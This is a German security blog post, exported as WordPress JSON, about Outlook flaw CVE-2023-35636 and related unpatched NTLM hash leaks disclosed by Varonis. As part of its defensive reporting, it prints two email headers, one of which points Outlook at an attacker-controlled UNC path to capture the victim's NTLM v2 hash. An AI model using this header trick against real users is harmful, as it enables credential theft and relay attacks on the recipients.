{"id":290755,"date":"2024-01-21T02:12:08","date_gmt":"2024-01-21T01:12:08","guid":{"rendered":"https:\/\/www.borncity.com\/blog\/?p=290755"},"modified":"2024-01-22T01:26:56","modified_gmt":"2024-01-22T00:26:56","slug":"kalendereinladung-in-outlook-kann-ber-cve-2023-35636-kennwort-verraten","status":"publish","type":"post","link":"https:\/\/borncity.com\/blog\/2024\/01\/21\/kalendereinladung-in-outlook-kann-ber-cve-2023-35636-kennwort-verraten\/","title":{"rendered":"Kalendereinladung in Outlook kann (über CVE-2023-35636) Kennwort verraten"},"content":{"rendered":"

[English<\/a>]Kleiner Nachtrag zum Dezember 2023-Patchday, bei dem auch eine Information Disclosure-Schwachstelle (CVE-2023-35636) geschlossen wurde. Nun wurde bekannt, dass bereits die Annahme einer Kalendereinladung durch einen Nutzer dessen Kennwort verraten kann. W\u00e4hrend diese Schwachstelle in Outlook gepatcht ist, gibt es weitere Methoden, um einen NTLM-Hash, z.B. per Dateimanager, abzurufen. Diese Schwachstellen sidn nicht gepatcht. Hier ein \u00dcberblick \u00fcber den Sachverhalt.<\/p>\n

<\/p>\n

Outlook 2016 Update KB5002529<\/h2>\n

\"\"Ich hatte es im Blog-Beitrag Microsoft Office Updates (12. Dezember 2023)<\/a> erw\u00e4hnt, dass Microsoft das Update KB5002529<\/a> f\u00fcr die MSI-Installationsvarianten von Microsoft Office 2016 ver\u00f6ffentlicht hat. Dort schrieb Microsoft, dass dieses Sicherheitsupdate eine Sicherheitsanf\u00e4lligkeit bei der Offenlegung von Informationen in Microsoft Outlook behebt. Unter CVE-2023-35636<\/a> gab es dann weitere Informationen zu dieser Sicherheitsanf\u00e4lligkeit. Microsoft hat auch f\u00fcr die Click-2-Run-Versionen von Outlook 2019, 2021 und 365 ein Sicherheitsupdate ver\u00f6ffentlicht. Die Schwachstelle wird als important und mit einem CVSS 3.1 von 6.5 angegeben, wobei Microsoft die Ausnutzung f\u00fcr \"wenig wahrscheinlich h\u00e4lt\".<\/p>\n

Dort gibt Microsoft an, dass ein Angreifer diese Schwachstelle per E-Mail ausnutzen k\u00f6nnen, in dem er dem Benutzer eine speziell gestaltete Datei sendet und veranlasst, diese zu \u00f6ffnen. Es hei\u00dft weiter, dass bei einem webbasierten Angriffsszenario ein Angreifer eine Website hosten (oder eine kompromittierte Website nutzen, die vom Benutzer bereitgestellte Inhalte akzeptiert oder hostet) k\u00f6nnte, die eine speziell gestaltete Datei enth\u00e4lt, mit der die Sicherheitsl\u00fccke ausgenutzt wird.<\/p>\n

Ein Angreifer h\u00e4tte keine M\u00f6glichkeit, Benutzer zum Besuch der Website zu zwingen. Stattdessen m\u00fcsste der Angreifer die Benutzer davon \u00fcberzeugen, auf einen Link zu klicken, in der Regel durch eine Verlockung in einer E-Mail oder Sofortnachricht, und sie dann dazu bringen, die speziell gestaltete Datei zu \u00f6ffnen. Die Ausnutzung dieser Sicherheitsl\u00fccke k\u00f6nnte die Offenlegung von NTLM-Hashes erm\u00f6glichen.<\/p>\n

Kalendereinladungen reichen<\/h2>\n

Nun bin ich \u00fcber nachfolgenden Tweet auf den Artikel Accepting a calendar invite in Outlook could leak your password<\/a> von SC Media gesto\u00dfen, der etwas mehr Licht in die Angelegenheit bringt.<\/p>\n

\"CVE-2023-35636<\/p>\n

Dolev Taler von Varonis hat zum 18. Januar 2023 Details zur entdeckten Schwachstelle CVE-2023-35636 im Beitrag Outlook Vulnerability Discovery and New Ways to Leak NTLM Hashes<\/a> offen gelegt. Sicherheitsforscher von Varonis Threat Labs hatten die neue Sicherheitsl\u00fccke in Outlook und drei neue M\u00f6glichkeiten entdeckt, auf gehashte NTLM v2-Passw\u00f6rter zuzugreifen, indem Outlook, Windows Performance Analyzer (WPA) und Windows File Explorer ausgenutzt werden.<\/p>\n

NTLM-Hash erm\u00f6glicht Offline-Brute-Force-Angriffe<\/h3>\n

Mit Zugang zu diesen Passw\u00f6rtern k\u00f6nnen Angreifer einen Offline-Brute-Force-Angriff oder einen Authentifizierungs-Relay-Angriff versuchen, um ein Konto zu kompromittieren und Zugang zu erhalten. CVE-2023-35636 erm\u00f6glicht eine Ausnutzung der Kalenderfreigabefunktion in Microsoft Outlook. Das Hinzuf\u00fcgen von zwei Kopfzeilen zu einer E-Mail weist Outlook an, den Inhalt freizugeben und einen bestimmten Rechner zu kontaktieren. Dies bietet eine M\u00f6glichkeit zum Abfangen eines NTLM v2-Hashes.<\/p>\n

NTLM v2 ist ein kryptografisches Protokoll, das von Microsoft Windows zur Authentifizierung von Benutzern bei Remote-Servern verwendet wird. Obwohl NTLM v2 eine sicherere Version des urspr\u00fcnglichen NTLM ist, ist v2 immer noch anf\u00e4llig f\u00fcr Offline Brute-Force- und Authentifizierungs-Relay-Angriffe.<\/p><\/blockquote>\n

Outlook ist als Standard-E-Mail- und Kalender-Tool f\u00fcr die Microsoft 365-Suite, das von Millionen von Menschen auf der ganzen Welt sowohl f\u00fcr berufliche als auch f\u00fcr private Zwecke genutzt wird, ein attraktives Ziel f\u00fcr Angreifer. Der Sachverhalt aus Beitrag Microsoft durch russische Midnight Blizzard gehackt; E-Mails seit Nov. 2023 ausspioniert<\/a> ist der beste Beweis.<\/p>\n

Der Outlook-Angriffsvektor<\/h3>\n

Outlook bietet die M\u00f6glichkeit, Kalender zwischen Benutzern zu teilen. Varonis Threat Labs hat nun herausgefunden, dass diese Funktion ausgenutzt werden kann, um das gehashte Passwort weiterzuleiten. Dazu reicht es, einige Kopfzeilen in eine E-Mail einzuf\u00fcgen, um einen Authentifizierungsversuch auszul\u00f6sen.<\/p>\n

\"Content-Class\" = \"Sharing\"
\n\"x-sharing-config-url\" = \\\\(Attacker machine)\\a.ics<\/p>\n

Die erste Zeile weist Outlook darauf hin, dass die Mail Inhalte zum Teilen enth\u00e4lt. Die zweite Zeile verweist Outlook an den Rechner des Angreifers, um von dort eine .ics-Einladungsdatei zu laden. Ein Angreifer braucht also nur eine E-Mail-Einladung an das Opfer zu schicken, in der der \".ICS\"-Dateipfad auf den vom Angreifer kontrollierten Computer verweist. Durch \"Abh\u00f6ren\" eines selbst kontrollierten Pfads (Dom\u00e4ne, IP, Ordnerpfad, UNC usw.) kann der Angreifer Pakete mit Verbindungsversuchen, mit dem\u00a0 enthaltenen Hash, erhalten, und dann versuchen, auf diese Ressource zuzugreifen.<\/p>\n

Wenn das Opfer auf die Schaltfl\u00e4che zur Annahme der Kalendereinladung in der Nachricht klickt, versucht sein Rechner, die .ics-Konfigurationsdatei vom Rechner des Angreifers abzurufen. Dabei wird aber der NTLM-Hash des Opfers w\u00e4hrend der Authentifizierung offengelegt.<\/p>\n

Schwachstelle in Outlook geschlossen<\/h3>\n

Es ist also wichtig, nur eine Outlook-Version zu verwenden, bei der die Schwachstelle CVE-2023-35636 gepatcht ist (Office 2013 hat keine Updates mehr erhalten). Microsoft hat den Exploit f\u00fcr Outlook als \"wichtig\" unter CVE-2023-35636 und mit der Bewertung 6.5 anerkannt. Zum 12. Dezember 2023 wurde ein Patch f\u00fcr CVE-2023-35636 f\u00fcr Outlook 2016, 2019, 2021 und Outlook 365 ver\u00f6ffentlicht. Dort ist die Schwachstelle also geschlossen.<\/p>\n

Microsoft patcht unvollst\u00e4ndig<\/h2>\n

Im Beitrag Outlook Vulnerability Discovery and New Ways to Leak NTLM Hashes<\/a> werden aber noch die beiden anderen Methoden zum Abrufen des NTLM-Hashs \u00fcber den Windows Performance Analyzer (WPA) und den Windows File Explorer (WFE) offen gelegt. Varonis hatte Microsoft \u00fcber das Microsoft Security Response Center am 5. Juli 2023 \u00fcber die WPA-Schwachstelle und am 30. Juli 2023 \u00fcber die Sicherheitsl\u00fccke im Windows File Explorer informiert. Microsoft hat aber beide Tickets aufgrund des \"mittleren Schweregrads\" wieder geschlossen.<\/p>\n

Diese Schwachstellen sind also wohl bisher ungepatcht. Dvir Sason, Security Research Manager bei Varonis, best\u00e4tigte dies gegen\u00fcber SC Media: \"Diese gemeldeten Schwachstellen wurden nicht gepatcht; das laut Microsoft dieses Verhalten nicht als Schwachstelle betrachtet wird\". Die Varonis Sicherheitsforscher betrachten die beiden Schwachstellen jedoch als einen grundlegenden legitimen Angriffsvektor. Ungepatchte Systeme sind weiterhin anf\u00e4llig f\u00fcr Bedrohungsakteure, die mit diesen Methoden versuchen, gehashte Kennw\u00f6rter zu stehlen.<\/p>\n","protected":false},"excerpt":{"rendered":"

[English]Kleiner Nachtrag zum Dezember 2023-Patchday, bei dem auch eine Information Disclosure-Schwachstelle (CVE-2023-35636) geschlossen wurde. Nun wurde bekannt, dass bereits die Annahme einer Kalendereinladung durch einen Nutzer dessen Kennwort verraten kann. W\u00e4hrend diese Schwachstelle in Outlook gepatcht ist, gibt es weitere … Weiterlesen →<\/span><\/a><\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[270,426,185],"tags":[215,8450,4328,4315],"class_list":["post-290755","post","type-post","status-publish","format-standard","hentry","category-office","category-sicherheit","category-update","tag-outlook","tag-patchday-13-2023","tag-sicherheit","tag-update"],"_links":{"self":[{"href":"https:\/\/borncity.com\/blog\/wp-json\/wp\/v2\/posts\/290755","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/borncity.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/borncity.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/borncity.com\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/borncity.com\/blog\/wp-json\/wp\/v2\/comments?post=290755"}],"version-history":[{"count":0,"href":"https:\/\/borncity.com\/blog\/wp-json\/wp\/v2\/posts\/290755\/revisions"}],"wp:attachment":[{"href":"https:\/\/borncity.com\/blog\/wp-json\/wp\/v2\/media?parent=290755"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/borncity.com\/blog\/wp-json\/wp\/v2\/categories?post=290755"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/borncity.com\/blog\/wp-json\/wp\/v2\/tags?post=290755"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}